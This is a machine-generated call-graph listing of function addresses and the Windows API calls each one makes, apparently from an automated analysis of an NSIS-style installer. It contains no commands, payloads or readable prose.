4043c8 4800->4801 4802 40439f 4800->4802 4803 403df6 8 API calls 4801->4803 4804 403d6b 19 API calls 4802->4804 4806 4043d4 4803->4806 4805 4043ac SetDlgItemTextW 4804->4805 4805->4801 4807 403f90 4808 403fa0 4807->4808 4809 403fbc 4807->4809 4818 405cb0 GetDlgItemTextW 4808->4818 4811 403fc2 SHGetPathFromIDListW 4809->4811 4812 403fef 4809->4812 4814 403fd2 4811->4814 4817 403fd9 SendMessageW 4811->4817 4813 403fad SendMessageW 4813->4809 4815 40141d 80 API calls 4814->4815 4815->4817 4817->4812 4818->4813 4819 402392 4820 40145c 18 API calls 4819->4820 4821 402399 4820->4821 4824 407224 4821->4824 4825 406efe 25 API calls 4824->4825 4826 407244 4825->4826 4827 4023a7 4826->4827 4828 40724e lstrcpynW lstrcmpW 4826->4828 4829 407280 4828->4829 4830 407286 lstrcpynW 4828->4830 4829->4830 4830->4827 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4831 402797 4832 40145c 18 API calls 4831->4832 4833 4027ae 4832->4833 4834 40145c 18 API calls 4833->4834 4835 4027b7 4834->4835 4836 40145c 18 API calls 4835->4836 4837 4027c0 GetPrivateProfileStringW lstrcmpW 4836->4837 4838 401e9a 4839 40145c 18 API calls 4838->4839 4840 401ea1 4839->4840 4841 401446 18 API calls 4840->4841 4842 401eab wsprintfW 4841->4842 3802 401a1f 3803 40145c 18 API calls 3802->3803 3804 401a26 3803->3804 3805 4062cf 11 API calls 3804->3805 3806 401a49 3805->3806 3807 401a64 3806->3807 3808 401a5c 3806->3808 3877 406035 lstrcpynW 3807->3877 3876 406035 lstrcpynW 3808->3876 3811 401a6f 3878 40674e lstrlenW CharPrevW 3811->3878 3812 401a62 3815 406064 5 API calls 3812->3815 3846 401a81 3815->3846 3816 406301 2 API calls 3816->3846 3819 401a98 CompareFileTime 3819->3846 3820 401ba9 3821 404f9e 25 API calls 3820->3821 3823 401bb3 3821->3823 3822 401b5d 3824 404f9e 25 API calls 3822->3824 3855 40337f 3823->3855 3826 401b70 3824->3826 3830 4062cf 11 API calls 3826->3830 3828 406035 lstrcpynW 3828->3846 3829 4062cf 11 API calls 3831 401bda 3829->3831 3835 401b8b 3830->3835 3832 401be9 SetFileTime 3831->3832 3833 401bf8 CloseHandle 3831->3833 3832->3833 3833->3835 3836 401c09 3833->3836 3834 406831 18 API calls 3834->3846 3837 401c21 3836->3837 3838 401c0e 3836->3838 3839 406831 18 API calls 3837->3839 3840 406831 18 API calls 3838->3840 3841 401c29 3839->3841 3843 401c16 lstrcatW 3840->3843 3844 4062cf 11 API calls 3841->3844 3843->3841 3847 401c34 3844->3847 3845 401b50 3849 401b93 3845->3849 3850 401b53 3845->3850 3846->3816 3846->3819 3846->3820 3846->3822 3846->3828 3846->3834 3846->3845 3848 4062cf 11 API calls 3846->3848 3854 405e7c GetFileAttributesW CreateFileW 3846->3854 3881 405e5c GetFileAttributesW 3846->3881 3884 405ccc 3846->3884 3851 405ccc MessageBoxIndirectW 3847->3851 3848->3846 3852 4062cf 11 API calls 3849->3852 3853 4062cf 11 API calls 3850->3853 3851->3835 3852->3835 3853->3822 3854->3846 3856 40339a 3855->3856 3857 4033c7 3856->3857 3890 403368 SetFilePointer 3856->3890 3888 403336 ReadFile 3857->3888 3861 401bc6 3861->3829 3862 403546 3864 40354a 3862->3864 3865 40356e 3862->3865 3863 4033eb GetTickCount 3863->3861 3868 403438 3863->3868 3866 403336 ReadFile 3864->3866 3865->3861 3869 403336 ReadFile 3865->3869 3870 40358d WriteFile 3865->3870 3866->3861 3867 403336 ReadFile 3867->3868 3868->3861 3868->3867 3872 40348a GetTickCount 3868->3872 3873 4034af MulDiv wsprintfW 3868->3873 3875 4034f3 WriteFile 3868->3875 3869->3865 3870->3861 3871 4035a1 3870->3871 3871->3861 3871->3865 3872->3868 3874 404f9e 25 API calls 3873->3874 3874->3868 3875->3861 3875->3868 3876->3812 3877->3811 3879 401a75 lstrcatW 3878->3879 3880 40676b lstrcatW 3878->3880 3879->3812 3880->3879 3882 405e79 3881->3882 3883 405e6b SetFileAttributesW 3881->3883 3882->3846 3883->3882 3885 405ce1 3884->3885 3886 405d2f 3885->3886 3887 405cf7 MessageBoxIndirectW 3885->3887 3886->3846 3887->3886 3889 403357 3888->3889 3889->3861 3889->3862 3889->3863 3890->3857 4843 40209f GetDlgItem GetClientRect 4844 40145c 18 API calls 4843->4844 4845 4020cf LoadImageW SendMessageW 4844->4845 4846 4030e3 4845->4846 4847 4020ed DeleteObject 4845->4847 4847->4846 4848 402b9f 4849 401446 18 API calls 4848->4849 4853 402ba7 4849->4853 4850 402c4a 4851 402bdf ReadFile 4851->4853 4860 402c3d 4851->4860 4852 401446 18 API calls 4852->4860 4853->4850 4853->4851 4854 402c06 MultiByteToWideChar 4853->4854 4855 402c3f 4853->4855 4856 402c4f 4853->4856 4853->4860 4854->4853 4854->4856 4861 405f7d wsprintfW 4855->4861 4858 402c6b SetFilePointer 4856->4858 4856->4860 4858->4860 4859 402d17 ReadFile 4859->4860 4860->4850 4860->4852 4860->4859 4861->4850 3417 402b23 GlobalAlloc 3418 402b39 3417->3418 3419 402b4b 3417->3419 3428 401446 3418->3428 3421 40145c 18 API calls 3419->3421 3422 402b52 WideCharToMultiByte lstrlenA 3421->3422 3423 402b41 3422->3423 3424 402b84 WriteFile 3423->3424 3425 402b93 3423->3425 3424->3425 3426 402384 GlobalFree 3424->3426 3426->3425 3429 406831 18 API calls 3428->3429 3430 401455 3429->3430 3430->3423 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3441 4054a5 3442 4055f9 3441->3442 3443 4054bd 3441->3443 3445 40564a 3442->3445 3446 40560a GetDlgItem GetDlgItem 3442->3446 3443->3442 3444 4054c9 3443->3444 3448 4054d4 SetWindowPos 3444->3448 3449 4054e7 3444->3449 3447 4056a4 3445->3447 3455 40139d 80 API calls 3445->3455 3450 403d6b 19 API calls 3446->3450 3456 4055f4 3447->3456 3511 403ddb 3447->3511 3448->3449 3452 405504 3449->3452 3453 4054ec ShowWindow 3449->3453 3454 405634 SetClassLongW 3450->3454 3457 405526 3452->3457 3458 40550c DestroyWindow 3452->3458 3453->3452 3459 40141d 80 API calls 3454->3459 3462 40567c 3455->3462 3460 40552b SetWindowLongW 3457->3460 3461 40553c 3457->3461 3463 405908 3458->3463 3459->3445 3460->3456 3464 4055e5 3461->3464 3465 405548 GetDlgItem 3461->3465 3462->3447 3466 405680 SendMessageW 3462->3466 3463->3456 3472 405939 ShowWindow 3463->3472 3531 403df6 3464->3531 3469 405578 3465->3469 3470 40555b SendMessageW IsWindowEnabled 3465->3470 3466->3456 3467 40141d 80 API calls 3480 4056b6 3467->3480 3468 40590a DestroyWindow KiUserCallbackDispatcher 3468->3463 3474 405585 3469->3474 3477 4055cc SendMessageW 3469->3477 3478 405598 3469->3478 3486 40557d 3469->3486 3470->3456 3470->3469 3472->3456 3473 406831 18 API calls 3473->3480 3474->3477 3474->3486 3476 403d6b 19 API calls 3476->3480 3477->3464 3481 4055a0 3478->3481 3482 4055b5 3478->3482 3479 4055b3 3479->3464 3480->3456 3480->3467 3480->3468 3480->3473 3480->3476 3502 40584a DestroyWindow 3480->3502 3514 403d6b 3480->3514 3525 40141d 3481->3525 3483 40141d 80 API calls 3482->3483 3485 4055bc 3483->3485 3485->3464 3485->3486 3528 403d44 3486->3528 3488 405731 GetDlgItem 3489 405746 3488->3489 3490 40574f ShowWindow KiUserCallbackDispatcher 3488->3490 3489->3490 3517 403db1 KiUserCallbackDispatcher 3490->3517 3492 405779 EnableWindow 3495 40578d 3492->3495 3493 405792 GetSystemMenu EnableMenuItem SendMessageW 3494 4057c2 SendMessageW 3493->3494 3493->3495 3494->3495 3495->3493 3518 403dc4 SendMessageW 3495->3518 3519 406035 lstrcpynW 3495->3519 3498 4057f0 lstrlenW 3499 406831 18 API calls 3498->3499 3500 405806 SetWindowTextW 3499->3500 3520 40139d 3500->3520 3502->3463 3503 405864 CreateDialogParamW 3502->3503 3503->3463 3504 405897 3503->3504 3505 403d6b 19 API calls 3504->3505 3506 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3505->3506 3507 40139d 80 API calls 3506->3507 3508 4058e8 3507->3508 3508->3456 3509 4058f0 ShowWindow 3508->3509 3510 403ddb SendMessageW 3509->3510 3510->3463 3512 403df3 3511->3512 3513 403de4 SendMessageW 3511->3513 3512->3480 3513->3512 3515 406831 18 API calls 3514->3515 3516 403d76 SetDlgItemTextW 3515->3516 3516->3488 3517->3492 3518->3495 3519->3498 3523 4013a4 3520->3523 3521 401410 3521->3480 3523->3521 3524 4013dd MulDiv SendMessageW 3523->3524 3545 4015a0 3523->3545 3524->3523 3526 40139d 80 API calls 3525->3526 3527 401432 3526->3527 3527->3486 3529 403d51 SendMessageW 3528->3529 3530 403d4b 3528->3530 3529->3479 3530->3529 3532 403e0b GetWindowLongW 3531->3532 3542 403e94 3531->3542 3533 403e1c 3532->3533 3532->3542 3534 403e2b GetSysColor 3533->3534 3535 403e2e 3533->3535 3534->3535 3536 403e34 SetTextColor 3535->3536 3537 403e3e SetBkMode 3535->3537 3536->3537 3538 403e56 GetSysColor 3537->3538 3539 403e5c 3537->3539 3538->3539 3540 403e63 SetBkColor 3539->3540 3541 403e6d 3539->3541 3540->3541 3541->3542 3543 403e80 DeleteObject 3541->3543 3544 403e87 CreateBrushIndirect 3541->3544 3542->3456 3543->3544 3544->3542 3546 4015fa 3545->3546 3625 40160c 3545->3625 3547 401601 3546->3547 3548 401742 3546->3548 3549 401962 3546->3549 3550 4019ca 3546->3550 3551 40176e 3546->3551 3552 401650 3546->3552 3553 4017b1 3546->3553 3554 401672 3546->3554 3555 401693 3546->3555 3556 401616 3546->3556 3557 4016d6 3546->3557 3558 401736 3546->3558 3559 401897 3546->3559 3560 4018db 3546->3560 3561 40163c 3546->3561 3562 4016bd 3546->3562 3546->3625 3571 4062cf 11 API calls 3547->3571 3563 401751 ShowWindow 3548->3563 3564 401758 3548->3564 3568 40145c 18 API calls 3549->3568 3575 40145c 18 API calls 3550->3575 3565 40145c 18 API calls 3551->3565 3589 4062cf 11 API calls 3552->3589 3569 40145c 18 API calls 3553->3569 3566 40145c 18 API calls 3554->3566 3570 401446 18 API calls 3555->3570 3574 40145c 18 API calls 3556->3574 3588 401446 18 API calls 3557->3588 3557->3625 3558->3625 3679 405f7d wsprintfW 3558->3679 3567 40145c 18 API calls 3559->3567 3572 40145c 18 API calls 3560->3572 3576 401647 PostQuitMessage 3561->3576 3561->3625 3573 4062cf 11 API calls 3562->3573 3563->3564 3577 401765 ShowWindow 3564->3577 3564->3625 3578 401775 3565->3578 3579 401678 3566->3579 3580 40189d 3567->3580 3581 401968 GetFullPathNameW 3568->3581 3582 4017b8 3569->3582 3583 40169a 3570->3583 3571->3625 3584 4018e2 3572->3584 3585 4016c7 SetForegroundWindow 3573->3585 3586 40161c 3574->3586 3587 4019d1 SearchPathW 3575->3587 3576->3625 3577->3625 3591 4062cf 11 API calls 3578->3591 3592 4062cf 11 API calls 3579->3592 3670 406301 FindFirstFileW 3580->3670 3594 4019a1 3581->3594 3595 40197f 3581->3595 3596 4062cf 11 API calls 3582->3596 3597 4062cf 11 API calls 3583->3597 3598 40145c 18 API calls 3584->3598 3585->3625 3599 4062cf 11 API calls 3586->3599 3587->3558 3587->3625 3588->3625 3600 401664 3589->3600 3601 401785 SetFileAttributesW 3591->3601 3602 401683 3592->3602 3614 4019b8 GetShortPathNameW 3594->3614 3594->3625 3595->3594 3620 406301 2 API calls 3595->3620 3604 4017c9 3596->3604 3605 4016a7 Sleep 3597->3605 3606 4018eb 3598->3606 3607 401627 3599->3607 3608 40139d 65 API calls 3600->3608 3609 40179a 3601->3609 3601->3625 3618 404f9e 25 API calls 3602->3618 3652 405d85 CharNextW CharNextW 3604->3652 3605->3625 3615 40145c 18 API calls 3606->3615 3616 404f9e 25 API calls 3607->3616 3608->3625 3617 4062cf 11 API calls 3609->3617 3610 4018c2 3621 4062cf 11 API calls 3610->3621 3611 4018a9 3619 4062cf 11 API calls 3611->3619 3614->3625 3623 4018f5 3615->3623 3616->3625 3617->3625 3618->3625 3619->3625 3624 401991 3620->3624 3621->3625 3622 4017d4 3626 401864 3622->3626 3629 405d32 CharNextW 3622->3629 3647 4062cf 11 API calls 3622->3647 3627 4062cf 11 API calls 3623->3627 3624->3594 3678 406035 lstrcpynW 3624->3678 3625->3523 3626->3602 3628 40186e 3626->3628 3630 401902 MoveFileW 3627->3630 3658 404f9e 3628->3658 3633 4017e6 CreateDirectoryW 3629->3633 3634 401912 3630->3634 3635 40191e 3630->3635 3633->3622 3637 4017fe GetLastError 3633->3637 3634->3602 3641 406301 2 API calls 3635->3641 3651 401942 3635->3651 3639 401827 GetFileAttributesW 3637->3639 3640 40180b GetLastError 3637->3640 3639->3622 3644 4062cf 11 API calls 3640->3644 3645 401929 3641->3645 3642 401882 SetCurrentDirectoryW 3642->3625 3643 4062cf 11 API calls 3646 40195c 3643->3646 3644->3622 3645->3651 3673 406c94 3645->3673 3646->3625 3647->3622 3650 404f9e 25 API calls 3650->3651 3651->3643 3653 405da2 3652->3653 3656 405db4 3652->3656 3655 405daf CharNextW 3653->3655 3653->3656 3654 405dd8 3654->3622 3655->3654 3656->3654 3657 405d32 CharNextW 3656->3657 3657->3656 3659 404fb7 3658->3659 3660 401875 3658->3660 3661 404fd5 lstrlenW 3659->3661 3662 406831 18 API calls 3659->3662 3669 406035 lstrcpynW 3660->3669 3663 404fe3 lstrlenW 3661->3663 3664 404ffe 3661->3664 3662->3661 3663->3660 3665 404ff5 lstrcatW 3663->3665 3666 405011 3664->3666 3667 405004 SetWindowTextW 3664->3667 3665->3664 3666->3660 3668 405017 SendMessageW SendMessageW SendMessageW 3666->3668 3667->3666 3668->3660 3669->3642 3671 4018a5 3670->3671 3672 406317 FindClose 3670->3672 3671->3610 3671->3611 3672->3671 3680 406328 GetModuleHandleA 3673->3680 3677 401936 3677->3650 3678->3594 3679->3625 3681 406340 LoadLibraryA 3680->3681 3682 40634b GetProcAddress 3680->3682 3681->3682 3683 406359 3681->3683 3682->3683 3683->3677 3684 406ac5 lstrcpyW 3683->3684 3685 406b13 GetShortPathNameW 3684->3685 3686 406aea 3684->3686 3687 406b2c 3685->3687 3688 406c8e 3685->3688 3710 405e7c GetFileAttributesW CreateFileW 3686->3710 3687->3688 3691 406b34 WideCharToMultiByte 3687->3691 3688->3677 3690 406af3 CloseHandle GetShortPathNameW 3690->3688 3692 406b0b 3690->3692 3691->3688 3693 406b51 WideCharToMultiByte 3691->3693 3692->3685 3692->3688 3693->3688 3694 406b69 wsprintfA 3693->3694 3695 406831 18 API calls 3694->3695 3696 406b95 3695->3696 3711 405e7c GetFileAttributesW CreateFileW 3696->3711 3698 406ba2 3698->3688 3699 406baf GetFileSize GlobalAlloc 3698->3699 3700 406bd0 ReadFile 3699->3700 3701 406c84 CloseHandle 3699->3701 3700->3701 3702 406bea 3700->3702 3701->3688 3702->3701 3712 405de2 lstrlenA 3702->3712 3705 406c03 lstrcpyA 3708 406c25 3705->3708 3706 406c17 3707 405de2 4 API calls 3706->3707 3707->3708 3709 406c5c SetFilePointer WriteFile GlobalFree 3708->3709 3709->3701 3710->3690 3711->3698 3713 405e23 lstrlenA 3712->3713 3714 405e2b 3713->3714 3715 405dfc lstrcmpiA 3713->3715 3714->3705 3714->3706 3715->3714 3716 405e1a CharNextA 3715->3716 3716->3713 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3891 4038af #17 SetErrorMode OleInitialize 3892 406328 3 API calls 3891->3892 3893 4038f2 SHGetFileInfoW 3892->3893 3965 406035 lstrcpynW 3893->3965 3895 40391d GetCommandLineW 3966 406035 lstrcpynW 3895->3966 3897 40392f GetModuleHandleW 3898 403947 3897->3898 3899 405d32 CharNextW 3898->3899 3900 403956 CharNextW 3899->3900 3911 403968 3900->3911 3901 403a02 3902 403a21 GetTempPathW 3901->3902 3967 4037f8 3902->3967 3904 403a37 3906 403a3b GetWindowsDirectoryW lstrcatW 3904->3906 3907 403a5f DeleteFileW 3904->3907 3905 405d32 CharNextW 3905->3911 3909 4037f8 11 API calls 3906->3909 3975 4035b3 GetTickCount GetModuleFileNameW 3907->3975 3912 403a57 3909->3912 3910 403a73 3913 403af8 3910->3913 3915 405d32 CharNextW 3910->3915 3951 403add 3910->3951 3911->3901 3911->3905 3918 403a04 3911->3918 3912->3907 3912->3913 4060 403885 3913->4060 3919 403a8a 3915->3919 4067 406035 lstrcpynW 3918->4067 3930 403b23 lstrcatW lstrcmpiW 3919->3930 3931 403ab5 3919->3931 3920 403aed 3923 406113 9 API calls 3920->3923 3921 403bfa 3924 403c7d 3921->3924 3926 406328 3 API calls 3921->3926 3922 403b0d 3925 405ccc MessageBoxIndirectW 3922->3925 3923->3913 3927 403b1b ExitProcess 3925->3927 3929 403c09 3926->3929 3933 406328 3 API calls 3929->3933 3930->3913 3932 403b3f CreateDirectoryW SetCurrentDirectoryW 3930->3932 4068 4067aa 3931->4068 3935 403b62 3932->3935 3936 403b57 3932->3936 3937 403c12 3933->3937 4085 406035 lstrcpynW 3935->4085 4084 406035 lstrcpynW 3936->4084 3941 406328 3 API calls 3937->3941 3944 403c1b 3941->3944 3943 403b70 4086 406035 lstrcpynW 3943->4086 3945 403c69 ExitWindowsEx 3944->3945 3950 403c29 GetCurrentProcess 3944->3950 3945->3924 3949 403c76 3945->3949 3946 403ad2 4083 406035 lstrcpynW 3946->4083 3952 40141d 80 API calls 3949->3952 3954 403c39 3950->3954 4003 405958 3951->4003 3952->3924 3953 406831 18 API calls 3955 403b98 DeleteFileW 3953->3955 3954->3945 3956 403ba5 CopyFileW 3955->3956 3962 403b7f 3955->3962 3956->3962 3957 403bee 3958 406c94 42 API calls 3957->3958 3960 403bf5 3958->3960 3959 406c94 42 API calls 3959->3962 3960->3913 3961 406831 18 API calls 3961->3962 3962->3953 3962->3957 3962->3959 3962->3961 3964 403bd9 CloseHandle 3962->3964 4087 405c6b CreateProcessW 3962->4087 3964->3962 3965->3895 3966->3897 3968 406064 5 API calls 3967->3968 3969 403804 3968->3969 3970 40380e 3969->3970 3971 40674e 3 API calls 3969->3971 3970->3904 3972 403816 CreateDirectoryW 3971->3972 3973 405eab 2 API calls 3972->3973 3974 40382a 3973->3974 3974->3904 4090 405e7c GetFileAttributesW CreateFileW 3975->4090 3977 4035f3 3997 403603 3977->3997 4091 406035 lstrcpynW 3977->4091 3979 403619 4092 40677d lstrlenW 3979->4092 3983 40362a GetFileSize 3984 403726 3983->3984 3998 403641 3983->3998 4097 4032d2 3984->4097 3986 40372f 3988 40376b GlobalAlloc 3986->3988 3986->3997 4109 403368 SetFilePointer 3986->4109 3987 403336 ReadFile 3987->3998 4108 403368 SetFilePointer 3988->4108 3991 4037e9 3994 4032d2 6 API calls 3991->3994 3992 403786 3995 40337f 33 API calls 3992->3995 3993 40374c 3996 403336 ReadFile 3993->3996 3994->3997 4001 403792 3995->4001 4000 403757 3996->4000 3997->3910 3998->3984 3998->3987 3998->3991 3998->3997 3999 4032d2 6 API calls 3998->3999 3999->3998 4000->3988 4000->3997 4001->3997 4001->4001 4002 4037c0 SetFilePointer 4001->4002 4002->3997 4004 406328 3 API calls 4003->4004 4005 40596c 4004->4005 4006 405972 4005->4006 4007 405984 4005->4007 4123 405f7d wsprintfW 4006->4123 4008 405eff 3 API calls 4007->4008 4009 4059b5 4008->4009 4011 4059d4 lstrcatW 4009->4011 4013 405eff 3 API calls 4009->4013 4012 405982 4011->4012 4114 403ec1 4012->4114 4013->4011 4016 4067aa 18 API calls 4017 405a06 4016->4017 4018 405a9c 4017->4018 4020 405eff 3 API calls 4017->4020 4019 4067aa 18 API calls 4018->4019 4021 405aa2 4019->4021 4022 405a38 4020->4022 4023 405ab2 4021->4023 4024 406831 18 API calls 4021->4024 4022->4018 4026 405a5b lstrlenW 4022->4026 4029 405d32 CharNextW 4022->4029 4025 405ad2 LoadImageW 4023->4025 4125 403ea0 4023->4125 4024->4023 4027 405b92 4025->4027 4028 405afd RegisterClassW 4025->4028 4030 405a69 lstrcmpiW 4026->4030 4031 405a8f 4026->4031 4035 40141d 80 API calls 4027->4035 4033 405b9c 4028->4033 4034 405b45 SystemParametersInfoW CreateWindowExW 4028->4034 4036 405a56 4029->4036 4030->4031 4037 405a79 GetFileAttributesW 4030->4037 4039 40674e 3 API calls 4031->4039 4033->3920 4034->4027 4040 405b98 4035->4040 4036->4026 4041 405a85 4037->4041 4038 405ac8 4038->4025 4042 405a95 4039->4042 4040->4033 4043 403ec1 19 API calls 4040->4043 4041->4031 4044 40677d 2 API calls 4041->4044 4124 406035 lstrcpynW 4042->4124 4046 405ba9 4043->4046 4044->4031 4047 405bb5 ShowWindow LoadLibraryW 4046->4047 4048 405c38 4046->4048 4049 405bd4 LoadLibraryW 4047->4049 4050 405bdb GetClassInfoW 4047->4050 4051 405073 83 API calls 4048->4051 4049->4050 4052 405c05 DialogBoxParamW 4050->4052 4053 405bef GetClassInfoW RegisterClassW 4050->4053 4054 405c3e 4051->4054 4057 40141d 80 API calls 4052->4057 4053->4052 4055 405c42 4054->4055 4056 405c5a 4054->4056 4055->4033 4059 40141d 80 API calls 4055->4059 4058 40141d 80 API calls 4056->4058 4057->4033 4058->4033 4059->4033 4061 40389d 4060->4061 4062 40388f CloseHandle 4060->4062 4132 403caf 4061->4132 4062->4061 4067->3902 4185 406035 lstrcpynW 4068->4185 4070 4067bb 4071 405d85 4 API calls 4070->4071 4072 4067c1 4071->4072 4073 406064 5 API calls 4072->4073 4080 403ac3 4072->4080 4076 4067d1 4073->4076 4074 406809 lstrlenW 4075 406810 4074->4075 4074->4076 4078 40674e 3 API calls 4075->4078 4076->4074 4077 406301 2 API calls 4076->4077 4076->4080 4081 40677d 2 API calls 4076->4081 4077->4076 4079 406816 GetFileAttributesW 4078->4079 4079->4080 4080->3913 4082 406035 lstrcpynW 4080->4082 4081->4074 4082->3946 4083->3951 4084->3935 4085->3943 4086->3962 4088 405ca6 4087->4088 4089 405c9a CloseHandle 4087->4089 4088->3962 4089->4088 4090->3977 4091->3979 4093 40678c 4092->4093 4094 406792 CharPrevW 4093->4094 4095 40361f 4093->4095 4094->4093 4094->4095 4096 406035 lstrcpynW 4095->4096 4096->3983 4098 4032f3 4097->4098 4099 4032db 4097->4099 4102 403303 GetTickCount 4098->4102 4103 4032fb 4098->4103 4100 4032e4 DestroyWindow 4099->4100 4101 4032eb 4099->4101 4100->4101 4101->3986 4105 403311 CreateDialogParamW ShowWindow 4102->4105 4106 403334 4102->4106 4110 40635e 4103->4110 4105->4106 4106->3986 4108->3992 4109->3993 4111 40637b PeekMessageW 4110->4111 4112 406371 DispatchMessageW 4111->4112 4113 403301 4111->4113 4112->4111 4113->3986 4115 403ed5 4114->4115 4130 405f7d wsprintfW 4115->4130 4117 403f49 4118 406831 18 API calls 4117->4118 4119 403f55 SetWindowTextW 4118->4119 4120 403f70 4119->4120 4121 403f8b 4120->4121 4122 406831 18 API calls 4120->4122 4121->4016 4122->4120 4123->4012 4124->4018 4131 406035 lstrcpynW 4125->4131 4127 403eb4 4128 40674e 3 API calls 4127->4128 4129 403eba lstrcatW 4128->4129 4129->4038 4130->4117 4131->4127 4133 403cbd 4132->4133 4134 4038a2 4133->4134 4135 403cc2 FreeLibrary GlobalFree 4133->4135 4136 406cc7 4134->4136 4135->4134 4135->4135 4137 4067aa 18 API calls 4136->4137 4138 406cda 4137->4138 4139 406ce3 DeleteFileW 4138->4139 4140 406cfa 4138->4140 4179 4038ae CoUninitialize 4139->4179 4141 406e77 4140->4141 4183 406035 lstrcpynW 4140->4183 4147 406301 2 API calls 4141->4147 4167 406e84 4141->4167 4141->4179 4143 406d25 4144 406d39 4143->4144 4145 406d2f lstrcatW 4143->4145 4148 40677d 2 API calls 4144->4148 4146 406d3f 4145->4146 4150 406d4f lstrcatW 4146->4150 4152 406d57 lstrlenW FindFirstFileW 4146->4152 4149 406e90 4147->4149 4148->4146 4153 40674e 3 API calls 4149->4153 4149->4179 4150->4152 4151 4062cf 11 API calls 4151->4179 4156 406e67 4152->4156 4180 406d7e 4152->4180 4154 406e9a 4153->4154 4157 4062cf 11 API calls 4154->4157 4155 405d32 CharNextW 4155->4180 4156->4141 4158 406ea5 4157->4158 4159 405e5c 2 API calls 4158->4159 4160 406ead RemoveDirectoryW 4159->4160 4164 406ef0 4160->4164 4165 406eb9 4160->4165 4161 406e44 FindNextFileW 4163 406e5c FindClose 4161->4163 4161->4180 4163->4156 4166 404f9e 25 API calls 4164->4166 4165->4167 4168 406ebf 4165->4168 4166->4179 4167->4151 4170 4062cf 11 API calls 